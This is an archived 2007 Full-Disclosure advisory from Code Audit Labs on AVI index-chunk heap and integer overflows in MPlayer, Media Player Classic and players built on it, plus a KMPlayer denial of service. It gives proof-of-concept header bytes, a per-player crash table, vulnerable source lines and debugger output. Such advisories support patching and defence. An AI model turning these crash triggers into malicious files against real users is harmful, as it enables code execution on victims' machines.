lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <46E81106.2080901@gmail.com>
Date: Thu, 13 Sep 2007 00:17:10 +0800
From: Code Audit Labs <vulnhunt@...il.com>
To: full-disclosure@...ts.grok.org.uk,  bugtraq@...urityfocus.com, 
	vulnwatch@...nwatch.org
Subject: CAL-20070912-1 Multiple vendor produce handling
	AVI file vulnerabilities

   CAL-20070912-1 Multiple vendor produce handling AVI file vulnerabilities


   Code Audit Labs (http://www.vulnhunt.com) Code Audit for some popular
media player and discovered some vulnerabilities.

   one heap overflow was discovered in MPlayer.
   one heap overflow and one integer overflow were discovered in media
player classic(mpc) and other produces base on mpc like mympc and
StormPlayer).
   Some D.o.S (raise 100% cpu ) were discovred in KMPlayer.

   By tricking a user into opening a specially crafted media file,
an attacker who exploit heap overflow in MPlayer or media player classic
could potential execute arbitrary code with the user's privileges.


Original LINK:
==============
http://www.vulnhunt.com/advisories/CAL-20070912-1_Multiple_vendor_produce_handling_AVI_file_vulnerabilities.txt


Affected Product
=================

1 MPlayer 1.0rc1 and prior (we tested version 20070729)
2 media player classic v6.4.9.0 and prior; and other produces base on it.
  ( mympc 1.0.0.1 and StormPlayer 1.0.4)
3 KMPlayer v2.9.3.1210 and prior


Technical Description
=====================

those vulnerabilities are discoered via playing with AVI
1) indx truck size
2) wLongsPerEntry
3) nEntriesInuse

Olny build 5 testcases

test case 1 (new_avihead_poc1.avi)
------------------------------------------
69 6E 64 78 FF FF FF FF 01 00 64 73 20 00 00 10

indx truck size 0xffffffff
wLongsPerEntry 0x0001
BIndexSubType is 0x64
bIndexType is 0x73
nEntriesInuse is 0x10000020

test case 2 (new_avihead_poc2.avi)
------------------------------------------
69 6E 64 78 00 FF FF FF FF FF 64 73 FF FF FF FF

indx truck size 0xffffff00
wLongsPerEntry 0xffff
BIndexSubType is 0x64
bIndexType is 0x73
nEntriesInuse is 0xFFFFFFFF

test case 3 (new_avihead_poc3.avi)
------------------------------------------
69 6E 64 78 00 FF FF FF 01 11 64 73 20 00 00 10

indx truck size 0xffffff00
wLongsPerEntry 0x0001
BIndexSubType is 0x64
bIndexType is 0x73
nEntriesInuse is 0x10000020

test case 4 (new_avihead_poc4.avi)
------------------------------------------
69 6E 64 78 00 FF 00 00 01 00 64 73 20 00 00 10

indx truck size 0x0000ff00
wLongsPerEntry 0x0001
BIndexSubType is 0x64
bIndexType is 0x73
nEntriesInuse is 0x10000020

test case 5 (new_avihead_poc5.avi)
------------------------------------------
69 6E 64 78 00 FF 00 00 04 00 64 73 10 00 00 40

indx truck size 0x0000ff00
wLongsPerEntry 0x0004
BIndexSubType is 0x64
bIndexType is 0x73
nEntriesInuse is 0x40000010


TEST RESULT
+---------+-----------+-----------+-----------+-----------+----------+
| produce | testcase1 | testcase2 | testcase3 | testcase4 |testcase5 |
+---------+-----------+-----------+-----------+-----------+----------+
| wmp     |  ok       |  ok       |   ok      |   ok      |  ok      |
+---------+-----------+-----------+-----------+-----------+----------+
| mplayer |  ok       |  ok       |  HO/CRASH |   ok      |  ok      |
+---------+-----------+-----------+-----------+-----------+----------+
| mpc     |  HO       |  HO       |  HO       |   ok      |  ok      |
+---------+-----------+-----------+-----------+-----------+----------+
|KMPlayer | RAISE CPU | RAISE CPU | RAISE CPU |   ok      |  ok      |
+---------+-----------+-----------+-----------+-----------+----------+
| mympc   |  HO       |  HO       |  HO       |   ok      |  ok      |
+---------+-----------+-----------+-----------+-----------+----------+
|StormPlay|  HO       |  HO       |  HO       |   ok      |  ok      |
+---------+-----------+-----------+-----------+-----------+----------+
| xplayer |  ok       |  ok       |   ok      |   ok      |  ok      |
+---------+-----------+-----------+-----------+-----------+----------+


LITTLE ANALYSIS
===============

MPlayer svn 20070729 (last version)

1:new_mplayer_avihead_poc3.avi null pointer in winxp or glibc 2.5(depend 
on compile option).
if glibc <2.5(maybe prior) or win2000 sp4 ,it will be heap overflow.

    vulnerability code in libmpdemux/aviheader.c:

     232       print_avisuperindex_chunk(s,MSGL_V);
     233
     234       if( ((chunksize/4)/s->wLongsPerEntry) < s->nEntriesInUse){
     235         mp_msg (MSGT_HEADER, MSGL_WARN, "Broken super index 
chunk\n");
     236         s->nEntriesInUse = (chunksize/4)/s->wLongsPerEntry;
     237       }
     238
     239       // Check and fix this useless crap
     240       if(s->wLongsPerEntry != sizeof (avisuperindex_entry)/4) {
     241           mp_msg (MSGT_HEADER, MSGL_WARN, "Broken super index 
chunk size: %u\n",s->wLongsPerEntry);
     242           s->wLongsPerEntry = sizeof(avisuperindex_entry)/4;
     243       }
     244       s->aIndex = calloc(s->nEntriesInUse, sizeof 
(avisuperindex_entry));
     245       s->stdidx = calloc(s->nEntriesInUse, sizeof 
(avistdindex_chunk));
     246
     247       // now the real index of indices
     248       for (i=0; i<s->nEntriesInUse; i++) {
     249           chunksize-=16;


     that's funny, the above code still can be bypassed because of 
incorrect check  order.

     and example code
     calloc(0x10000001, 0x10);

     it will return NULL in winxp or gligc 2.5
     it will return 0x10 sizes heap in glibc <2.5(maybe prior) or 
win2000 sp4


0:000> g
(54c.284): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=02a7e740 ebx=024eecb8 ecx=00000000 edx=01414930 esi=ffffff00 
edi=ffffff00
eip=0053b084 esp=0022e5e0 ebp=0000b6d0 iopl=0         nv up ei ng nz na 
po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000 
efl=00200286
gmplayer+0x13b084:
0053b084 89741500         mov     [ebp+edx],esi 
ss:0023:01420000=02cc1b9e
0:000> kb
ChildEBP RetAddr  Args to Child
WARNING: Stack unwind information not available. Following frames may be 
wrong.
0000b6d0 00000000 00000000 00000000 00000000 gmplayer+0x13b084


media player classic v6.4.9.0 (last version)
--------------------------------------------
there are many produces base on media player classic.
all of produces are affected.

1:new_avihead_poc1.avi heap overflow

(270.198): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=060fa8b0 ebx=060ff000 ecx=00000011 edx=00000000 esi=060fa86c 
edi=060ff000
eip=006b8a4a esp=05a3f1e8 ebp=05a3f1f0 iopl=0         nv up ei pl nz ac 
po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000 
efl=00010216
*** ERROR: Module load completed but symbols could not be loaded for 
C:\Documents and Settings\xx\mpc2kxp6490\mplayerc.exe
mplayerc+0x2b8a4a:
006b8a4a f3a5            rep  movsd ds:060fa86c=73640001 
es:060ff000=????????
0:003> kb
ChildEBP RetAddr  Args to Child
WARNING: Stack unwind information not available. Following frames may be 
wrong.
05a3f1f0 005a02d6 060ff000 060fa86c 00000044 mplayerc+0x2b8a4a
00000000 00000000 00000000 00000000 00000000 mplayerc+0x1a02d6

2: new_avihead_poc2.avi
    new_avihead_poc3.avi

VERIFIER STOP 00000004: pid 0x870: extreme size request

	029B0000 : Heap handle
	FFFFFF08 : Size requested
	00000000 :
	00000000 :


(870.a88): Break instruction exception - code 80000003 (first chance)
eax=00000000 ebx=ffffff08 ecx=7c93eb05 edx=05a3ea68 esi=00000004 
edi=029b0000
eip=7c921230 esp=05a3ec9c ebp=05a3ecb0 iopl=0         nv up ei pl zr na 
po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000 
efl=00000246
ntdll!DbgBreakPoint:
7c921230 cc               int     3

in a word, assume indx truck size is indx_truck_size,
the code like:
	buf =malloc(indx_truck_size+8)
         it will trigger integer overflow.


KMPlayer v2.9.3.1210 (last version)
-----------------------------------
1:new_avihead_poc1.avi D.o.S
2:new_avihead_poc2.avi D.o.S
3:new_avihead_poc3.avi D.o.S


DISCLOSURE TIMELINE:
====================
1: 2007-07-30 notice MPlayer vendor
2: 2007-07-31 the vendor reply
3: 2007-09-12 release this report


About Us:
=========
Code Audit Labs secure your software,provide Professional include source
code audit and binary code audit service.
Code Audit Labs:" You create value for customer,We protect your value"
http://www.VulnHunt.com

EOF


-- 
Code Audit Labs
http://www.vulnhunt.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ